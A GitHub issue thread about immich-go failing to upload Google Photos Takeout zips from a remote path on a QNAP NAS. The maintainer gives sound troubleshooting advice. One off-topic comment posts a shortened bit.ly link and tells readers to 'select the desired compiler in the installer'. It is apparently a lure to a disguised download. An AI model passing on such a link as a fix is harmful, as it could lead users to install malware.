### ISSUE TITLE
Unable to upload files located on another server

### ISSUE THREAD

**Issue by hidesminimally** [simulot/immich-go#469]
Hi!
I have an immich server on my QNAP NAS server, and my Google Photos Takeout .zip files. I'm attempting to upload via:
```
./immich-go -server=http://192.168.xx.xxx:2283 -key=xxx upload -create-albums -google-photos -date=2019-06  -skip-verify-ssl -dry-run root@http://192.168.xx.xxx:8080/my/path/to/files/*.zip
```

Terminal errors with `no such file or directory`. 

I've confirmed the path is correct by getting valid results via
```
ssh root@http://192.168.xx.xxx:8080 'ls /my/path/to/files/*.zip'
```

Any chance there's a simple fix to my problem? 

Thx so much in advance!

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by simulot** [comment]
> `... -dry-run root@http://192.168.xx.xxx:8080/my/path/to/files/*.zip`

`root@http://192.168.xx.xxx:8080/my/path/to/files/*.zip` isn't a valid path to files.

You have several options:

1. install and run immich-go directly the QNAP, files are directly accessible
2. Copy the zips on your local machine and run immich-go here
3. Place your zip files in a QNAP share, and mount it on your system, then the files are accessible via the file sharing service

The option 3 is the less effective solution. File are downloaded to be handled by Immich-go and uploaded to the server. Avoid a wifi connection for this.

**Comment by hidesminimally** [comment]
@simulot 
Thanks for the in depth reply. 

Ideally I would do option #1 but I'm unable to even install go lang on the QNAP device. Do you happen to have any advice for this? 
Upon moving the package to /usr/local/ the QNAP device reports there is no memory left!

**Comment by simulot** [comment]
It's simpler than you think.
Executable file for your system is available in the released files. 

Grab the one that fits with your system and place it somewhere on the qnap.

Doing so, your photos are on an accessible path.

**Comment by hidesminimally** [comment]
@simulot Thanks -

I didn't have go-lang installed on the QNAP machine and so I had to do it through a container 😅 

Got it running but am stuck here:

```
root@edd030b24c3c:/app/immich-go# ./immich-go -server=http://192.xxx50.205:2283 -key=xxxx upload -dry-run -create-albums -google-photos  /app/Public/GOOGLE\ TAKEOUT
/PHOTOS/takeout-*.zip         
immich-go  0.21.3-5-g7ee54ba, commit 7ee54ba2b7b7f84b2e2e2ebc5c15de8bb5383bac, built at 2024-08-24T08:31:55Z
. _ _  _ _ . _|_     _  _ 
|| | || | ||(_| | ─ (_|(_)
 v 0.21.3-5-g7ee54ba _)   

```

It just hangs here....

**Comment by simulot** [comment]
Glad you solved either the binary install and network issues.

There are too many files without sidecar for a google photos take out. I guess you missed one file while downloading the takeout.
This will lead to a lot of files not uploaded.

Discarded files are files that immich-go rejects. It could be failed videos.
Unsupported files are files that are not photos or movie, or some JSON files not related to photos
Check the log files for the exact reason
